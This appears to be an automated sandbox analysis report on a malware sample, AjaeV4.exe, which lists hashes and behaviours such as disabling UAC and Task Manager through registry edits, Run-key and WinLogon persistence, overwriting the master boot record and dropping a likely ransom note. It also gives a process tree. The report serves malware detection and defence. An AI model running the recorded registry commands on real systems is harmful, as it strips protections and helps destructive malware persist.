Resubmissions
28/03/2025, 06:39
250328-he1a9svkz6 1028/03/2025, 01:14
250328-blp1jssmx9 1028/03/2025, 01:10
250328-bjsnnasmw4 1028/03/2025, 01:07
250328-bgxvlasmv7 10Analysis
-
max time kernel
120s -
max time network
122s -
platform
windows10-ltsc_2021_x64 -
resource
win10ltsc2021-20250314-en -
resource tags
arch:x64arch:x86image:win10ltsc2021-20250314-enlocale:en-usos:windows10-ltsc_2021-x64system -
submitted
28/03/2025, 01:10
Static task
static1
Behavioral task
behavioral1
Sample
AjaeV4.exe
Resource
win10ltsc2021-20250314-en
Errors
General
-
Target
AjaeV4.exe
-
Size
178KB
-
MD5
0ad31a746adb58b3f5640deb8219ad80
-
SHA1
e12836ae66f3f8ffa53df39ae6fcee9bb7826255
-
SHA256
c971f1b41d62b335166aa5ee66534041264c31452cfe9ce8c5fabdce4917a461
-
SHA512
fb07d16b155e702f6b1075ee3f6f09335eeac35026493eb368f421f19aabe8c1d4d781c6daaf89fe7d4d62c0efe182c83fe64e3f0f6e44a6a8ab9f330c489f7c
-
SSDEEP
3072:Vq6+ouCpk2mpcWJ0r+QNTBf6E9hrLypYX+rxSeYNFnPTlf7QQFLczTQi2acGx:Vldk1cWQRNTBSu1yHEdNVZjQgLczUihx
Malware Config
Signatures
-
Disables service(s) 3 TTPs
-
Modifies WinLogon for persistence 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, C:\\Windows\\System32\\sex.exe" reg.exe -
UAC bypass 3 TTPs 2 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" reg.exe -
Creates new service(s) 2 TTPs
-
Disables Task Manager via registry modification
-
Stops running service(s) 4 TTPs
-
Checks computer location settings 2 TTPs 4 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1498259476-758239146-3116387113-1000\Control Panel\International\Geo\Nation AjaeV4.exe Key value queried \REGISTRY\USER\S-1-5-21-1498259476-758239146-3116387113-1000\Control Panel\International\Geo\Nation cmd.exe Key value queried \REGISTRY\USER\S-1-5-21-1498259476-758239146-3116387113-1000\Control Panel\International\Geo\Nation sex.exe Key value queried \REGISTRY\USER\S-1-5-21-1498259476-758239146-3116387113-1000\Control Panel\International\Geo\Nation sex.exe -
Executes dropped EXE 3 IoCs
pid Process 784 sex.exe 4136 sex.exe 2528 mbr.exe -
Adds Run key to start application 2 TTPs 4 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\sex.exe = "C:\\Windows\\System32\\sex.exe" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-1498259476-758239146-3116387113-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\sex.exe = "C:\\Windows\\System32\\sex.exe" reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\mbr.exe = "C:\\Windows\\N3OS3X3R\\mbr.exe" reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\player.vbs = "player.vbs" reg.exe -
Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
description ioc Process File opened for modification \??\PhysicalDrive0 mbr.exe -
Drops file in System32 directory 11 IoCs
description ioc Process File created C:\Windows\System32\sex.exe cmd.exe File opened for modification C:\Windows\System32\sex.exe cmd.exe File created C:\Windows\System32\SwiftHackProtection.pdf.scr cmd.exe File opened for modification C:\Windows\SysWOW64\ sex.exe File created C:\Windows\SysWOW64\ sex.exe File opened for modification C:\Windows\SysWOW64\ sex.exe File opened for modification C:\Windows\System32\ajae.txt cmd.exe File opened for modification C:\Windows\System32\ajae.txt cmd.exe File opened for modification C:\Windows\System32\SwiftHackProtection.pdf.scr cmd.exe File created C:\Windows\SysWOW64\rockmymbr.exe sex.exe File created C:\Windows\SysWOW64\ sex.exe -
Drops file in Windows directory 64 IoCs
description ioc Process File created C:\Windows\SystemTemp\msedge_url_fetcher_4852_1332479770\GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_90_1_0.crx msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping4852_1955116096\_locales\zh_TW\messages.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping4852_1955116096\_locales\bg\messages.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping4852_1955116096\_locales\et\messages.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping4852_1955116096\_locales\el\messages.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping4852_1955116096\_locales\si\messages.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping4852_1955116096\_locales\gu\messages.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping4852_1955116096\offscreendocument_main.js msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping4852_1955116096\_locales\ja\messages.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping4852_1955116096\_locales\zh_CN\messages.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping4852_1955116096\_locales\en_US\messages.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping4852_1955116096\_locales\ur\messages.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping4852_1955116096\_locales\ne\messages.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping4852_1955116096\_locales\iw\messages.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping4852_1955116096\manifest.fingerprint msedge.exe File opened for modification C:\Windows\SystemTemp msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping4852_1955116096\_locales\fi\messages.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping4852_1955116096\_locales\fr_CA\messages.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping4852_1955116096\_locales\ca\messages.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping4852_1955116096\_locales\vi\messages.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping4852_1955116096\_locales\sl\messages.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping4852_1955116096\_locales\es\messages.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping4852_1955116096\_locales\fr\messages.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping4852_1955116096\_locales\pt_PT\messages.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping4852_1955116096\_locales\cs\messages.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping4852_1955116096\_locales\ar\messages.json msedge.exe File opened for modification C:\Windows\SystemTemp msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping4852_1955116096\manifest.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping4852_1955116096\_locales\pl\messages.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping4852_1955116096\_locales\km\messages.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping4852_1955116096\_locales\pa\messages.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping4852_1955116096\_locales\en_GB\messages.json msedge.exe File opened for modification C:\Windows\N3OS3X3R\ajaemsg.vbs cmd.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping4852_1955116096\service_worker_bin_prod.js msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping4852_1955116096\offscreendocument.html msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping4852_1955116096\_locales\lv\messages.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping4852_1955116096\_locales\ml\messages.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping4852_1955116096\_locales\zh_HK\messages.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping4852_1955116096\_locales\ta\messages.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping4852_1955116096\_locales\lt\messages.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping4852_1955116096\_locales\hy\messages.json msedge.exe File opened for modification C:\Windows\N3OS3X3R\mbr.exe cmd.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping4852_1955116096\_locales\kk\messages.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping4852_1955116096\_locales\am\messages.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping4852_1955116096\_locales\be\messages.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping4852_1955116096\_locales\it\messages.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping4852_1955116096\_locales\zu\messages.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping4852_1955116096\_locales\is\messages.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping4852_1955116096\128.png msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping4852_1955116096\page_embed_script.js msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping4852_1955116096\_locales\sk\messages.json msedge.exe File created C:\Windows\N3OS3X3R\mbr.exe cmd.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping4852_1955116096\_locales\my\messages.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping4852_1955116096\_locales\ru\messages.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping4852_1955116096\_locales\id\messages.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping4852_1955116096\_locales\sr\messages.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping4852_1955116096\_locales\pt_BR\messages.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping4852_1955116096\_locales\eu\messages.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping4852_1955116096\_locales\tr\messages.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping4852_1955116096\_locales\sw\messages.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping4852_1955116096\_metadata\verified_contents.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping4852_1955116096\dasherSettingSchema.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping4852_1955116096\_locales\no\messages.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping4852_1955116096\_locales\bn\messages.json msedge.exe -
Launches sc.exe 8 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 5408 sc.exe 6108 sc.exe 4208 sc.exe 2808 sc.exe 5660 sc.exe 3004 sc.exe 5908 sc.exe 1288 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Accessibility Features 1 TTPs
Windows contains accessibility features that may be used by adversaries to establish persistence and/or elevate privileges.
-
System Location Discovery: System Language Discovery 1 TTPs 4 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language AjaeV4.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sex.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sex.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mbr.exe -
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 msedge.exe -
Delays execution with timeout.exe 26 IoCs
pid Process 2544 timeout.exe 4892 timeout.exe 5176 timeout.exe 384 timeout.exe 1028 timeout.exe 1272 timeout.exe 4308 timeout.exe 4908 timeout.exe 3004 timeout.exe 4444 timeout.exe 4312 timeout.exe 3852 timeout.exe 4952 timeout.exe 548 timeout.exe 2556 timeout.exe 3180 timeout.exe 5476 timeout.exe 2412 timeout.exe 4580 timeout.exe 2556 timeout.exe 4716 timeout.exe 2460 timeout.exe 2896 timeout.exe 5936 timeout.exe 5724 timeout.exe 4532 timeout.exe -
Enumerates system info in registry 2 TTPs 9 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe -
Modifies data under HKEY_USERS 4 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry msedge.exe Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133875979217051366" msedge.exe Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry msedge.exe Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry msedge.exe -
Modifies registry class 4 IoCs
description ioc Process Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-1498259476-758239146-3116387113-1000\{85EC49B6-C54F-47E7-A509-ECC9D8E95FF0} msedge.exe Key created \REGISTRY\USER\S-1-5-21-1498259476-758239146-3116387113-1000_Classes\Local Settings cmd.exe Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-1498259476-758239146-3116387113-1000\{4ACCDAA0-D815-4E92-A326-CFD567180646} msedge.exe Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-1498259476-758239146-3116387113-1000\{C4B27CC8-908B-4B38-B2C3-340E6FE54319} msedge.exe -
Modifies registry key 1 TTPs 5 IoCs
pid Process 1200 reg.exe 2164 reg.exe 3020 reg.exe 1588 reg.exe 4064 reg.exe -
Opens file in notepad (likely ransom note) 3 IoCs
pid Process 5812 NOTEPAD.EXE 1012 NOTEPAD.EXE 6108 NOTEPAD.EXE -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 51 IoCs
pid Process 4852 msedge.exe 4852 msedge.exe 4852 msedge.exe 4852 msedge.exe 4852 msedge.exe 4852 msedge.exe 4852 msedge.exe 4852 msedge.exe 4852 msedge.exe 4852 msedge.exe 4852 msedge.exe 4852 msedge.exe 4852 msedge.exe 4852 msedge.exe 4852 msedge.exe 4852 msedge.exe 4852 msedge.exe 4852 msedge.exe 4852 msedge.exe 4852 msedge.exe 4852 msedge.exe 4852 msedge.exe 4852 msedge.exe 4852 msedge.exe 4852 msedge.exe 4852 msedge.exe 4852 msedge.exe 4536 msedge.exe 4536 msedge.exe 4536 msedge.exe 4536 msedge.exe 4536 msedge.exe 3764 msedge.exe 3764 msedge.exe 3764 msedge.exe 3764 msedge.exe 3764 msedge.exe 3764 msedge.exe 3764 msedge.exe 3764 msedge.exe 3764 msedge.exe 3764 msedge.exe 3764 msedge.exe 3764 msedge.exe 3764 msedge.exe 3764 msedge.exe 3764 msedge.exe 3764 msedge.exe 3764 msedge.exe 3764 msedge.exe 3764 msedge.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: 33 1824 AUDIODG.EXE Token: SeIncBasePriorityPrivilege 1824 AUDIODG.EXE -
Suspicious use of FindShellTrayWindow 5 IoCs
pid Process 4852 msedge.exe 4852 msedge.exe 4536 msedge.exe 4536 msedge.exe 3764 msedge.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2004 wrote to memory of 4276 2004 AjaeV4.exe 81 PID 2004 wrote to memory of 4276 2004 AjaeV4.exe 81 PID 4276 wrote to memory of 4816 4276 cmd.exe 84 PID 4276 wrote to memory of 4816 4276 cmd.exe 84 PID 4276 wrote to memory of 6108 4276 cmd.exe 85 PID 4276 wrote to memory of 6108 4276 cmd.exe 85 PID 4276 wrote to memory of 4444 4276 cmd.exe 86 PID 4276 wrote to memory of 4444 4276 cmd.exe 86 PID 4276 wrote to memory of 4716 4276 cmd.exe 91 PID 4276 wrote to memory of 4716 4276 cmd.exe 91 PID 4276 wrote to memory of 4852 4276 cmd.exe 93 PID 4276 wrote to memory of 4852 4276 cmd.exe 93 PID 4276 wrote to memory of 4892 4276 cmd.exe 94 PID 4276 wrote to memory of 4892 4276 cmd.exe 94 PID 4852 wrote to memory of 4916 4852 msedge.exe 95 PID 4852 wrote to memory of 4916 4852 msedge.exe 95 PID 4852 wrote to memory of 3772 4852 msedge.exe 96 PID 4852 wrote to memory of 3772 4852 msedge.exe 96 PID 4852 wrote to memory of 320 4852 msedge.exe 97 PID 4852 wrote to memory of 320 4852 msedge.exe 97 PID 4852 wrote to memory of 320 4852 msedge.exe 97 PID 4852 wrote to memory of 320 4852 msedge.exe 97 PID 4852 wrote to memory of 320 4852 msedge.exe 97 PID 4852 wrote to memory of 320 4852 msedge.exe 97 PID 4852 wrote to memory of 320 4852 msedge.exe 97 PID 4852 wrote to memory of 320 4852 msedge.exe 97 PID 4852 wrote to memory of 320 4852 msedge.exe 97 PID 4852 wrote to memory of 320 4852 msedge.exe 97 PID 4852 wrote to memory of 320 4852 msedge.exe 97 PID 4852 wrote to memory of 320 4852 msedge.exe 97 PID 4852 wrote to memory of 320 4852 msedge.exe 97 PID 4852 wrote to memory of 320 4852 msedge.exe 97 PID 4852 wrote to memory of 320 4852 msedge.exe 97 PID 4852 wrote to memory of 320 4852 msedge.exe 97 PID 4852 wrote to memory of 320 4852 msedge.exe 97 PID 4852 wrote to memory of 320 4852 msedge.exe 97 PID 4852 wrote to memory of 320 4852 msedge.exe 97 PID 4852 wrote to memory of 320 4852 msedge.exe 97 PID 4852 wrote to memory of 320 4852 msedge.exe 97 PID 4852 wrote to memory of 320 4852 msedge.exe 97 PID 4852 wrote to memory of 320 4852 msedge.exe 97 PID 4852 wrote to memory of 320 4852 msedge.exe 97 PID 4852 wrote to memory of 320 4852 msedge.exe 97 PID 4852 wrote to memory of 320 4852 msedge.exe 97 PID 4852 wrote to memory of 320 4852 msedge.exe 97 PID 4852 wrote to memory of 320 4852 msedge.exe 97 PID 4852 wrote to memory of 320 4852 msedge.exe 97 PID 4852 wrote to memory of 320 4852 msedge.exe 97 PID 4852 wrote to memory of 320 4852 msedge.exe 97 PID 4852 wrote to memory of 320 4852 msedge.exe 97 PID 4852 wrote to memory of 320 4852 msedge.exe 97 PID 4852 wrote to memory of 320 4852 msedge.exe 97 PID 4852 wrote to memory of 320 4852 msedge.exe 97 PID 4852 wrote to memory of 320 4852 msedge.exe 97 PID 4852 wrote to memory of 320 4852 msedge.exe 97 PID 4852 wrote to memory of 320 4852 msedge.exe 97 PID 4852 wrote to memory of 320 4852 msedge.exe 97 PID 4852 wrote to memory of 320 4852 msedge.exe 97 PID 4852 wrote to memory of 320 4852 msedge.exe 97 PID 4852 wrote to memory of 320 4852 msedge.exe 97 PID 4852 wrote to memory of 320 4852 msedge.exe 97 PID 4852 wrote to memory of 320 4852 msedge.exe 97 PID 4852 wrote to memory of 320 4852 msedge.exe 97 PID 4852 wrote to memory of 320 4852 msedge.exe 97
Processes
-
C:\Users\Admin\AppData\Local\Temp\AjaeV4.exe"C:\Users\Admin\AppData\Local\Temp\AjaeV4.exe"1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2004 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\4DC2.tmp\4DC3.tmp\4DC4.bat C:\Users\Admin\AppData\Local\Temp\AjaeV4.exe"2⤵
- Checks computer location settings
- Drops file in System32 directory
- Drops file in Windows directory
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:4276 -
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v DisableTaskMgr /t REG_DWORD /f /d 13⤵PID:4816
-
-
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\ajae.txt3⤵
- Opens file in notepad (likely ransom note)
PID:6108
-
-
C:\Windows\system32\timeout.exetimeout 3 /nobreak3⤵
- Delays execution with timeout.exe
PID:4444
-
-
C:\Windows\system32\timeout.exetimeout 5 /nobreak3⤵
- Delays execution with timeout.exe
PID:4716
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.google.co.ck/search?q=what3⤵
- Drops file in Windows directory
- Checks processor information in registry
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:4852 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x2f0,0x2f4,0x2f8,0x2ec,0x318,0x7ffc8f16f208,0x7ffc8f16f214,0x7ffc8f16f2204⤵PID:4916
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1872,i,6079562195681628862,14771679037704593150,262144 --variations-seed-version --mojo-platform-channel-handle=2292 /prefetch:34⤵PID:3772
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2128,i,6079562195681628862,14771679037704593150,262144 --variations-seed-version --mojo-platform-channel-handle=2120 /prefetch:24⤵PID:320
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=1428,i,6079562195681628862,14771679037704593150,262144 --variations-seed-version --mojo-platform-channel-handle=2740 /prefetch:84⤵PID:5024
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3528,i,6079562195681628862,14771679037704593150,262144 --variations-seed-version --mojo-platform-channel-handle=3556 /prefetch:14⤵PID:5756
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3552,i,6079562195681628862,14771679037704593150,262144 --variations-seed-version --mojo-platform-channel-handle=3564 /prefetch:14⤵PID:4928
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --always-read-main-dll --field-trial-handle=3488,i,6079562195681628862,14771679037704593150,262144 --variations-seed-version --mojo-platform-channel-handle=5056 /prefetch:14⤵PID:4588
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4984,i,6079562195681628862,14771679037704593150,262144 --variations-seed-version --mojo-platform-channel-handle=5168 /prefetch:84⤵PID:2552
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4860,i,6079562195681628862,14771679037704593150,262144 --variations-seed-version --mojo-platform-channel-handle=3612 /prefetch:84⤵PID:3252
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=3792,i,6079562195681628862,14771679037704593150,262144 --variations-seed-version --mojo-platform-channel-handle=3836 /prefetch:84⤵PID:4404
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=PooledProcess2 --lang=en-US --service-sandbox-type=utility --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5732,i,6079562195681628862,14771679037704593150,262144 --variations-seed-version --mojo-platform-channel-handle=5692 /prefetch:84⤵PID:4624
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5864,i,6079562195681628862,14771679037704593150,262144 --variations-seed-version --mojo-platform-channel-handle=5952 /prefetch:84⤵PID:3956
-
-
